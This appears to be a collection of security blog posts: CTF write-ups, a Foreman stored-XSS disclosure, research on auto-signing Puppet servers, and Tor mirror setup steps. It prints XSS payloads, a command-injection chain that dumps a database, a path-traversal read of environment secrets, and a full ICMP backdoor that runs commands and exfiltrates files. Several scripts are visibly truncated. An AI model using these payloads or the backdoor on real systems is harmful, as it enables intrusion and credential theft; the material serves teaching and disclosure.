NeverLAN CTF 2018 JSON parsing 1

The NeverLAN CTF challenge JSON parsing 1:

The linked file can be found here.

The JSON file contains a minute of VirusTotal scan logs. The challenge wants us to find the 5 AV engines which had the highest detection ratio (not detection count) in that timeframe. To solve it I created this quick Python script:

from __future__ import division
import json

result_true = {}
result_false = {}
result_ratio = {}

with open('file-20171020T1500') as f:
    for line in f:
        data = json.loads(line)
        for scanner in data['scans']:
            if data['scans'][scanner]['detected'] == True:
                if scanner in result_true:
                     result_true[scanner] += 1
                     result_true[scanner] = 1
                if scanner in result_false:
                     result_false[scanner] += 1
                     result_false[scanner] = 1

for scanner in result_false:
    result_ratio[scanner] = result_true[scanner] / (result_true[scanner] + result_false[scanner]) * 100

for key, value in sorted(result_ratio.iteritems(), key=lambda (k,v): (v,k)):
    print "%s: %s" % (key, value)

It will count detection for each AV engine and afterwards calculate the detection ratio for all. Running it will print all ratios sorted by lowest to highest. The last 5 separated by commas is the flag:

The flag is: SymantecMobileInsight,CrowdStrike,SentinelOne,Invincea,Endgame

hxp CTF 2017 irrgarten

The hxp CTF 2017 irrgarten challenge:

Running the dig command (with added +short to reduce output) provided the following output:

$ dig -t txt -p53535 @ +short
"try" "down.<domain>"

Playing around with it we figured out you can prepend “up”, “down”, “left” and “right” to the records to navigate a maze:

$ dig -t txt -p53535 @ +short
$ dig -t txt -p53535 @ +short
$ dig -t txt -p53535 @ +short

An empty reply probably means that there is a wall in the way otherwise you get the DNS record of the next tile.

To solve it and figure out how big the maze is, this very inefficient Python script was created:

#!/usr/bin/env python
import os
import subprocess

todo = [ '\n' ]
done = [ ]
directions = [ 'up', 'down', 'left', 'right' ]

while True:
  for tile in todo:
    check = subprocess.check_output("/usr/bin/dig +short -t ANY -p53535 @ " + tile, shell=True)
    print check
    for direction in directions:
      fqdn = direction + '.' + tile
      output = subprocess.check_output("/usr/bin/dig +short -t ANY -p53535 @ " + fqdn, shell=True)
      if output:
        if output not in done:
          print output


  if not todo:

This basically loops over all known tiles and checks if there is an accessible tile next to it in all 4 directions. If there is it adds it to the todo list and moves on. All newly found tiles get written to stdout. The base FQDN without the direction prepended gets also queried, this is where we suspected the flag will be found.

While this was running we were trying to implement a more efficient solution but it captured the flag after around 28’000 tiles:

"Flag:" "hxp{w3-h0p3-y0u-3nj0y3d-dd051n6-y0ur-dn5-1rr364r73n}"


Stored XSS in Foreman

Following up a bit on my recent post “Looking at public Puppet servers” I was wondering how an attacker could extend his rights within the Puppet ecosystem especially when a system like Foreman is used. Cross site scripting could be useful for this, gaining access to Foreman would allow an attacker basically to compromise everything.

I’ve focused first on facts. Facts are generated by the local system and can be overwritten given enough permissions. Displaying facts in the table seemed to be secured sufficiently, however there is another function on the /fact_values page: Showing an distribution graph of a specific fact.

When the graph is displayed HTML tags are not removed from facts and XSS is possible. Both in the fact name (as a header in the chart) and fact value (in the legend of the chart).

For example, add two new facts by running:

mkdir -p /etc/facter/facts.d/
cat << EOF >> /etc/facter/facts.d/xss.yaml
aaa_test_fact<script>alert(1)</script>: xxx
aab_test_fact: x<script>alert(1)</script>xx

It will shop up like this in the global /fact_values page:

Clicking on the “Show distribution chart” action on either of those facts will execute the provided alert(1) JavaScript:

That’s fun but not really useful, tricking someone to click on the distribution chart of such a weird fact seems impractical.

But since the XSS is in the value of the fact we can just overwrite more interesting facts on that node and hope that an Administrator wants to see the distribution of that fact. For example, let’s add this to xss.yaml:

kernelversion: x><script>alert(1)</script>xx

Now if an Administrator wants to know the distribution of kernel versions in his environment and he uses this chart feature on any host the alert(1) JavaScript will get executed. This is what any other node will look like:

And after navigating to the kernelversion distribution chart on that page:

Still some interaction needed. I’ve noticed that on the general /statistics page the same graphs are used and facts like “manufacturer” are used in them. Unlike the other graphs these do not have a legend. But when you hover over a portion of the graph you’ll get a tooltip with the fact value. This is again vulnerable to XSS. For example add to xss.yaml:

manufacturer: x<img src='/' onerror='alert(1)'>x

Now when you visit the /statistics page and move the mouse over the hardware graph, the alert(1) will execute:

Still needs interaction. But if you inject a value into all the graphs it may not take long for an Administrator to hover over one of those.

However: By default Foreman uses CSP. Stealing someones session with this setup is not easily possible. So my initial plan to steal an Administrators Foreman session failed in the end.

This was tested on Foreman 1.15.6 and reported to the Foreman security team on 2017-10-31.
CVE-2017-15100 has been assigned to this issue.
A fix is already implemented and will be released with version 1.16.0.


HITCON 2017 CTF Data & Mining

The HITCON 2017 CTF “Data & Mining” challenge:

The file attached was a 230MB big pcapng file.

I think I solved this by accident. I was sifting through the data for a bit and started to exclude the flows with a huge amount of data as it was mostly compressed / unreadable to me.

In the remaining data I stumbled over a plaintext TCP stream on port 3333:

This contained the flag in plaintext: hitcon{BTC_is_so_expensive_$$$$$$$}

In retrospective, searching for the string hitcon in the packet data would have worked as well.

HITCON 2017 CTF Baby Ruby Escaping

The HITCON 2017 CTF “Baby Ruby Escaping” challenge had the following description:

And the attached Ruby file was:

#!/usr/bin/env ruby

require 'readline'

proc {
  my_exit = Kernel.method(:exit!)
  my_puts = $stdout.method(:puts)
  ObjectSpace.each_object(Module) { |m| m.freeze if m != Readline }
  set_trace_func proc { |event, file, line, id, binding, klass|
    bad_id = /`|exec|foreach|fork|load|method_added|open|read(?!line$)|require|set_trace_func|spawn|syscall|system/
    bad_class = /(?&lt;!True|False|Nil)Class|Module|Dir|File|ObjectSpace|Process|Thread/
    if event =~ /class/ || (event =~ /call/ &amp;&amp; (id =~ bad_id || klass.to_s =~ bad_class)) "\e[1;31m== Hacker Detected (#{$&amp;}) ==\e[0m"

loop do
  line = Readline.readline('baby> ', true)
  puts '=> ' + eval(line, TOPLEVEL_BINDING).inspect

Connecting to on port 50216 we got the baby>  prompt and any entered Ruby code was executed except of course when it was blacklisted.

We were stuck with this for a while, nothing useful would execute. Until we noticed that all other challenges had only a “nc $ip $port” as the description and this one said: socat FILE:$(tty),raw,echo=0 TCP:

Of course, readline was implemented in this script. Connecting with the above socat and pressing TAB twice gave us:


Now we at least knew the filename to read was thanks_readline_for_completing_the_name_of_flag.

Again stuck on this for a while. We couldn’t load any new modules, we tried opening files in all the ways we could find and went through the Kernel module methods and finally found this way in the example of gets which worked:

baby> ARGV << 'thanks_readline_for_completing_the_name_of_flag'
=> ["thanks_readline_for_completing_the_name_of_flag"]
baby> print while gets
hitcon{Bl4ckb0x.br0k3n? ? puts(flag) : try_ag4in!}
=> nil

That’s it, the flag was: hitcon{Bl4ckb0x.br0k3n? ? puts(flag) : try_ag4in!}

HITCON 2017 CTF BabyFirst Revenge

The HITCON 2017 CTF “BabyFirst Revenge” challenge:

On the specified webserver this PHP script was running:

    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);

Basically what it does is to execute whatever is passed in the cmd parameter if it is no longer than 5 bytes. The output of the command is not displayed.

After some time we figured out that the sandbox folder is also reachable via HTTP, e.g.: So we could at least run things like ls>x and fetch the result.

Out next idea was to use shell wildcards to run longer commands. We wanted a list of all files on the system first. We’ve created a empty file named find and then used wildcards to run it:

curl '>find'
curl '*%20/>x'

The second curl executes * />x which will effectively expand to find />x. We got the file x from the server and saw that this file exists and is readable by our current user:


We need to get that file. We’ve used tar to get it by requesting:

curl '>tar'
curl '>zcf'
curl '>zzz'
curl '*%20/h*'

This creates the files tar, zcf and zzz. Then running * /h*. This expands then to:

tar zcf zzz /h*

Downloading the file “zzz” we find in the README.txt:

Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr

Running mysqldump with that username and password will be impossible with only wildcards. Instead we figured out that if we POST content to that URL it will be stored in a file in /tmp for the duration of that request. With that we can upload arbitrary commands but not yet execute them. Any form of sh /tmp/* is too long for the 5 bytes limit.

Tar to the rescue again:

cat << EOF >> exploit.php
<?php exec('mysqldump --single-transaction -ufl4444g -pSugZXUtgeJ52_Bvr --all-databases > /var/www/html/sandbox/727479ef7cedf30c03459bec7d87b0f0/dump.sql 2>&1'); ?>
curl ''
curl '>tar'
curl '>vcf'
curl '>z'
curl -F file=@exploit.php -X POST ''
curl ''

What it does is prepare a local file “exploit.php” which contains PHP code to run mysqldump and write the output to our sandbox folder. The --single-transaction parameter is important, without it the mysqldump will not complete due to missing permissions.

We then create the files tar, vcf and z on the server.
Then run * /t* which expands to:

tar vcf z /t*

This creates an uncompressed file “z” with all the contents of /tmp including our exploit which we POST’ed with that same request. After that with php z this tar file is executed. PHP will happily skip over all the binary parts and execute the PHP payload.

With that the “dump.sql” file is created, downloaded and it finally contained:

LOCK TABLES `this_is_the_fl4g` WRITE;
/*!40000 ALTER TABLE `this_is_the_fl4g` DISABLE KEYS */;
INSERT INTO `this_is_the_fl4g` VALUES ('hitcon{idea_from_phith0n,thank_you:)}');
/*!40000 ALTER TABLE `this_is_the_fl4g` ENABLE KEYS */;

The flag is: hitcon{idea_from_phith0n,thank_you:)}

SHA2017 CTF Network 300 (“Abuse Mail”) challenge

A quick write-up of the SHA2017 CTF Network 300 (“Abuse Mail”) challenge. I’ve participated with our newly formed team “Hackbuts”.

To solve this challenge you only get a 590KB abusemail.tgz file and this short description:

“Our abuse desk received an mail that someone from our network has hacked their company. With their help we found some suspected traffic in our network logs, but we can’t find what exactly has happened. Can you help us to catch the culprit?”

Unpacked we find 3 pcap files: abuse01.pcap, abuse02.pcap and abuse03.pcap.

After loading abuse01.pcap into Wireshark we immediately notice a telnet session. Following the TCP stream we see someone logging into a VPN router and running “ip xfrm state”:

The remaining packets are encrypted VPN traffic. Using the information of the telnet session we can setup decryption like this in Wireshark:

In the then decrypted remaining packets we’ll see a port scan and after that a HTTP session. The attacker exploited a command injection vulnerability in a ping web-service by sending requests like this to it: GET /?;ls

Further down in the HTTP stream he uploads malicious  Python script (“GET /?ip=%3Bwget%20http://”) and kindly enough echoed it back (“GET /?ip=%3Bcat%20/tmp/”). Through this we obtained this script:
#!/usr/bin/env python

import base64
import sys
import time
import subprocess
import threading

from Crypto import Random
from Crypto.Cipher import AES
from scapy.all import *

BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]
magic = "SHA2017"

class AESCipher:

    def __init__( self, key ):
        self.key = key

    def encrypt( self, raw ):
        raw = pad(raw)
        iv = AES.block_size )
        cipher = self.key, AES.MODE_CBC, iv )
        return base64.b64encode( iv + cipher.encrypt( raw ) )

    def decrypt( self, enc ):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        cipher =, AES.MODE_CBC, iv )
        return unpad(cipher.decrypt( enc[16:] ))

def run_command(cmd):
    ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
    output = ps.communicate()[0]
    return output

def send_ping(host, magic, data):
    data = cipher.encrypt(data)
    load = "{}:{}".format(magic, data)
    sr(IP(dst=host)/ICMP()/load, timeout=1, verbose=0)

def chunks(L, n):
    for i in xrange(0, len(L), n):
        yield L[i:i+n]

def get_file(host, magic, fn):
    data = base64.urlsafe_b64encode(open(fn, "rb").read())
    cnt = 0
    icmp_threads = []
    for line in chunks(data, 500):
        t = threading.Thread(target = send_ping, args = (host,magic, "getfile:{}:{}".format(cnt,line)))
        t.daemon = True
        cnt += 1

    for t in icmp_threads:

cipher = AESCipher(sys.argv[1])

while True:
        pkts = sniff(filter="icmp", timeout =5,count=1)

        for packet in pkts:
             if  str(packet.getlayer(ICMP).type) == "8": 
                input = packet[IP].load
                if input[0:len(magic)] == magic:
                    input = input.split(":")
                    data = cipher.decrypt(input[1]).split(":")
                    ip = packet[IP].src
                    if data[0] == "command":
                        output = run_command(data[1])
                        send_ping(ip, magic, "command:{}".format(output))
                    if data[0] == "getfile":
                        #print "[+] Sending file {}".format(data[1])
                        get_file(ip, magic, data[1])

And after that he executed the backdoor script:

GET /?ip=%3Bnohup%20sudo%20python%20/tmp/\& HTTP/1.1

Next looking at the other two captures we find only ICMP traffic in both of them. The data part of those packets is rather large, starts always with “SHA2017:” and the data following looks like a base64 encoded string:

Reviewing the Python script, this makes sense. is running commands and is encrypting its output, base64 encodes it and sends it via ICMP to a remote host. It can also transfer complete files.

In Wireshark we apply the data section as a column and export it as json for both abuse02.pcap and abuse03.pcap. And then extract only the data portion to new files:

fgrep abuse3.json |uniq |sed 's/^.*"": "//g' | sed 's/",.*//g' | sed 's/://g' > abuse3_data.txt
fgrep abuse2.json |uniq |sed 's/^.*"": "//g' | sed 's/",.*//g' | sed 's/://g' > abuse2_data.txt

Next convert this data into ASCII and remove the “SHA2017:” prefix:

while read line ; do echo "$line" | xxd -r -p |sed 's/^SHA2017://g' ; done < abuse2_data.txt > abuse2_ascii.txt
while read line ; do echo "$line" | xxd -r -p |sed 's/^SHA2017://g' ; done < abuse3_data.txt > abuse3_ascii.txt

Those files now contain base64 encoded data which is AES encrypted. We’ve created this simple decryption script based on the decrypt function of the script. The key was leaked in the first HTTP session when the script was initially started:

import base64
import sys
import time
from Crypto import Random
from Crypto.Cipher import AES

enc = sys.argv[1]
unpad = lambda s : s[0:-ord(s[-1])]
enc = base64.b64decode(enc)
iv = enc[:16]

cipher ='K8djhaIU8H2d1jNb', AES.MODE_CBC, iv )
print unpad(cipher.decrypt( enc[16:] ))

With this script we can decrypt both files now:

while read line ; do python "$line" ; done < abuse2_ascii.txt > abuse2_decrypted.txt
while read line ; do python "$line" ; done < abuse3_ascii.txt > abuse3_decrypted.txt

The abuse2_decrypted.txt now contains the results of Linux commands the attacker ran on the compromised “intranet” webserver. He started some nmap scans and listed a few files but also cat the TLS keys of the webserver and ran two more tcpdump sessions:

The data in abuse3_decrypted.txt appears to be from the file sending functionality of the backdoor script. The two pcap files “intranet.pcap” and “usb.pcap” are in this file. We’ve manually split up the files so that content for the specific file has its own file (“intranet_encoded.txt” and “usb_encoded.txt”). Also those “headers” were removed:


The files now have this format:


Reverse engineering the backdoor script we figure out that the number after getfile is the sequence in which the packet was sent – but it was not received in this order. We also see that the complete file is read, then base64 encoded (urlsafe) and then chunks of this data is exfiltrated via ICMP. This means that we need to order the lines and arrange it into one single line:

sed 's/getfile://g' intranet_encoded.txt |sort -n| sed 's/^.*://g' | tr -d "\n\r" > intranet_one_line.txt
sed 's/getfile://g' usb_encoded.txt |sort -n| sed 's/^.*://g' | tr -d "\n\r" > usb_one_line.txt

We created this simple script to decode the files:

import base64
import sys

file = sys.argv[1]
print base64.urlsafe_b64decode(open(file, "rb").read())

And decoded them:

python intranet_one_line.txt > intranet.pcap
python usb_one_line.txt > usb.pcap

Checking intranet.pcap we find a HTTPS session. We setup SSL decryption in Wireshark like this:

The key for this was obtained in abuse02 decrypted data. In the now decrypted session we can see that the attacker downloads “” from the intranet server. With Wireshark we can extract that object from the stream:

But we cannot open it, it is encrypted with a password.

Next we’ll look at the usb.pcap file. After a bit of research it is clear that the dump is from a USB keyboard. In Wireshark we apply the “leftover capture data” as a column and set a display filter to:

((frame.len == 72)) && !(usb.capdata == 00:00:00:00:00:00:00:00) && !(usb.capdata == 02:00:00:00:00:00:00:00)

With this and a HID usage table (, page 53) we can lookup the keystrokes:

If the data beings with “02” it means that the shift key is pressed as well, if not it’s lowercase. Going through the pcap we can see the attacker logging into the system, downloading via curl and finally using unzip to extract it, with the password: “Pyj4m4P4rtY@2017”

We use the same password to also decrypt the file and we get a secret.txt file, which is finally containing the flag:

Looking at public Puppet servers

This is about research I did a while ago but only now had time to finally write about.

In the beginning of this year I was curious to see how many Puppet 3 servers – back then freshly end of life – were connected directly to the internet:

If you don’t know Puppet: It’s a configuration management system that contains information to deploy systems and services in your infrastructure. You write code which defines how a system should be configured e.g. which software to install, which users to deploy, how a service is configured, etc.
It typically uses a client-server model, the clients periodically pull the configuration (“catalog”) from their configured server and apply it locally. Everything is transferred over TLS encrypted connections.

Puppet uses TLS client certificates to authenticate nodes. When a client (“puppet agent”) connects for the first time to a server it will generate a key locally and submit a certificate signing request to the server.
A operator needs to sign the certificate and from that point on the agent can pull its configuration from the server.

However it’s possible to configure Puppet server to simply automatically sign all incoming CSRs.
This is obviously not recommended to do unless you want anyone to get possibly sensitive information about your infrastructure. The Puppet documentation mentions several times that this is insecure:

First I was interested if anyone is already looking for servers configured like this.
I’ve setup a honeypot Puppet server with auto-signing enabled and waited.
But after months there still was not a single CSR submitted, only port scanners tried to connect to it.

I’ve decided to look for those servers myself.
With a small script I looped over around 2500 still online servers – there were still more but due to time constraints I only checked 2500. I’ve built a system which connects to all of those systems and submits a CSR. The “certname” – this is what operators will see when reviewing CSRs – was always the same and it was pretty obvious that it is not a legitimate request.
An attacker would do more recon, get the FQDNs of the Puppet server from its certificate and try to guess a more likely name.

Out of those 2500 servers:
89 immediately signed our certificate.

Out of those 89:
50 compiled a valid catalog that could have been applied directly.
39 tried to compile a catalog and failed with issues that could potentially be worked around on the client but no time was spent on that.

It is a normal setup to have a default role. If a unknown node connects it may get only this configuration applied. Usually this deploys the Administrator user accounts and sets generic settings. This happened a lot and that is already problematic since the system accounts also get their password hash configured which now could be brute-forced. And a lot of them also conveniently send along their sudoers configuration. An attacker could target higher privileged accounts directly.
But some of those servers assigned more generic roles automatically. Exposing root SSH keys, AWS credentials, configuration files of their services (Nginx, PostgreSQL, MySQL, …), tried to copy source code to it, passwords / password hashes of database and other service users:

And more. There are systems that could be immediately compromised with the information that they leak. The others at least tell attackers a lot about the system which makes further attacks much easier.

Here is where it gets interesting: One day later I connected again to the same 2500 servers using the same keys from the day before trying to retrieve a catalog. Normally we’d expect the number now to be stable or slightly less. But in this case it’s not:

145 servers allowed us to connect.
58 gave us a valid catalog that could be applied.

And one week later:
159 servers allowed us to connect.
63 gave us a valid catalog that could be applied.

Those servers were not offline during the first round either. They simply signed my CSR in the meantime without noticing that it’s none of their requests or I suspect that this is the combination of the following two items:

1) Generally when you are working with Puppet certificates you’ll be using “puppet cert $sub-command” to handle the TLS operations for you.

The problem is, that there is no way to tell it to simply reject a signing request.
You can “revoke” or “clean” certificates but it has to be signed first (see:
There may have been an option using the “puppet ca” command, but it has been deprecated and pretty much every documentation only mentions “puppet cert” nowadays.

You are left with these options:

  • Manually figure out where the .csr file is stored on the server and remove it
  • Use the deprecated tool “puppet ca destroy $certname”
  • Run “puppet cert sign $certname && puppet cert clean $certname”
  • Run “puppet cert sign $certname && puppet cert revoke $certname”

Some are unfortunately using the last two options.

There is the possibility that on some of those systems my certificate request was signed if only for a few seconds. Which brings us to the next issue:

2) Puppet server or in some cases the reverse proxy in front of it will only read the certificate revocation list at startup time.
If you don’t restart these services after revoking a certificate, it will still be allowed to connect.

“puppet cert revoke $certname” basically only adds the certificate to the CRL. It does not remove the signed certificate from the server.
I suspect that some operators have signed and revoked my certificate but haven’t restarted the service afterwards.

On the other hand “puppet cert clean $certname” will additionally remove the signed certificate from the server, when my client connects later it cannot get the signed certificate and is locked out.
This isn’t perfect either. If the client constantly requests the certificate it could retrieve it before the “clean” ran, but it is far better than only using “revoke”.

Depending on how you use Puppet, it may be one of your most critical systems containing the keys to your kingdom. There are very few cases where it makes sense to expose a Puppet server directly to the internet.
Those systems should be the best protected systems in your infrastructure, a compromised Puppet server essentially compromises all clients that are connecting to it.

Basic or naïve auto-signing should not be used in a production environment unless you can ensure that only trusted clients can reach the Puppet server. Only policy-based auto-signing or manual signing is secure otherwise.

Google CTF 2017 mindreader

This is a write-up for the Google CTF 2017 “mindreader” challenge.

The mindreader webserver presented us with only a single input form:

Pretty much with the second term entered it was clear that any filename specified in the form will be read from the local disk. This sounded like an easy challenge.
Better yet, since also /etc/shadow was displayed, this meant that the process is probably running with root privileges. Jackpot!

The logical next step was to try to fetch the usual files you’d expect to contain anything useful: Service configuration files, shell histories, any log file or pretty much anything we could think of – but nothing useful was returned.

Some files that we expected to exist like /etc/ssh/sshd_config threw a 404 and others (/proc/cpuinfo) a 403.

The HTTPS server responded with a nginx server header but there was no sign of it anywhere either. Nor of any other webserver.

With /etc/issue and /etc/debian_version the system was identified as a Debian 8.8.
Digging into the Debian specific files we grabbed /var/log/apt/history.log:

In that file it showed that those packages were all installed in a single transaction:

git mercurial pkg-config wget python-pip python2.7 python2.7-dev 
python3.4 python3.4-dev build-essential libcurl4-openssl-dev libffi-dev 
libjpeg-dev libmysqlclient-dev libpng12-dev libpq-dev libssl-dev 
libxml2-dev libxslt1-dev swig zlib1g-dev gfortran libatlas-dev 
libblas-dev libfreetype6-dev liblapack-dev libquadmath0 
libmemcached-dev libsasl2-2 libsasl2-dev libsasl2-modules sasl2-bin

Searching for that specific package list leads us to the Google Cloud Platform – Python Runtime Docker Image:

This explains the absence of pretty much any other service or configuration: We are attacking a Docker container.

The Dockerfile in that repository configures a work directory of /app. With that knowledge we can get the Python source code by requesting /app/

The source code revealed two key pieces of information:

  • There is an environment variable called “FLAG” (line 6).
  • Requests containing “proc” will always return a 403 (line 24).

Coincidentally environment variables are of course stored in /proc.

The filter looked solid and pythons open() does not accept wildcards. We cannot request anything containing “proc”.

But if there is a symlink pointing to a folder inside of /proc we wouldn’t need to request a file with “proc” in its name, we could traverse from there.

Quick research in a Vagrant VM showed that /dev/fd is a symlink to /proc/self/fd.
We requested /dev/fd/../environ:

And with that we finally got the flag.


CentOS Tor mirror

I’m running a CentOS Tor mirror as a hidden service.
It is available under:


If you want to use this mirror you must first install Tor.
Follow these instructions to do that:

Once that is complete and the Tor service is running you must install torsocks (from the EPEL repositories):

[root@localhost ~]# yum install epel-release

[root@localhost ~]# yum install torsocks


Afterwards change the YUM repository configuration file (/etc/yum.repos.d/CentOS-Base.repo) to include the hidden service URL.
Create a backup of the file in case you want to use the normal mirrors again.
The adjusted file should look like this (on CentOS 7):

name=CentOS-$releasever - Base

name=CentOS-$releasever - Updates

name=CentOS-$releasever - Extras

name=CentOS-$releasever - Plus

If you were manually editing the configuration file please notice that it is now using the baseurl option and not the mirrorlist option as before.

With this in place you can now use the hidden mirror and install packages like this:

[root@localhost ~]# export TORSOCKS_LOG_LEVEL=1 # only required to stop getting spammed with warning messages
[root@localhost ~]# torsocks yum -y install bind-utils
Loaded plugins: fastestmirror
base                                                                                                                                      | 3.6 kB  00:00:00     
epel/x86_64/metalink                                                                                                                      |  26 kB  00:00:00     
epel                                                                                                                                      | 4.3 kB  00:00:00     
extras                                                                                                                                    | 3.4 kB  00:00:00     
tor/x86_64/signature                                                                                                                      |  490 B  00:00:00     
tor/x86_64/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
tor-source/signature                                                                                                                      |  490 B  00:00:00     
tor-source/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
updates                                                                                                                                   | 3.4 kB  00:00:00     
(1/9): base/7/x86_64/group_gz                                                                                                             | 155 kB  00:00:00     
(2/9): epel/x86_64/group_gz                                                                                                               | 169 kB  00:00:00     
(3/9): epel/x86_64/updateinfo                                                                                                             | 449 kB  00:00:00     
(4/9): extras/7/x86_64/primary_db                                                                                                         |  90 kB  00:00:00     
(5/9): tor-source/primary_db                                                                                                              | 2.4 kB  00:00:01     
(6/9): tor/x86_64/primary_db                                                                                                              | 4.0 kB  00:00:01     
(7/9): updates/7/x86_64/primary_db                                                                                                        | 953 kB  00:00:01     
(8/9): epel/x86_64/primary_db                                                                                                             | 3.7 MB  00:00:02     
(9/9): base/7/x86_64/primary_db                                                                                                           | 5.3 MB  00:00:05     
Determining fastest mirrors
 * epel:
Resolving Dependencies
--> Running transaction check
---> Package bind-utils.x86_64 32:9.9.4-29.el7_2.1 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

 Package                               Arch                              Version                                        Repository                          Size
 bind-utils                            x86_64                            32:9.9.4-29.el7_2.1                            updates                            200 k

Transaction Summary
Install  1 Package

Total download size: 200 k
Installed size: 434 k
Downloading packages:
bind-utils-9.9.4-29.el7_2.1.x86_64.rpm                                                                                                    | 200 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Installing : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 
  Verifying  : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 

  bind-utils.x86_64 32:9.9.4-29.el7_2.1                                                                                                                          


Contact me if you need any help or if you have any suggestions.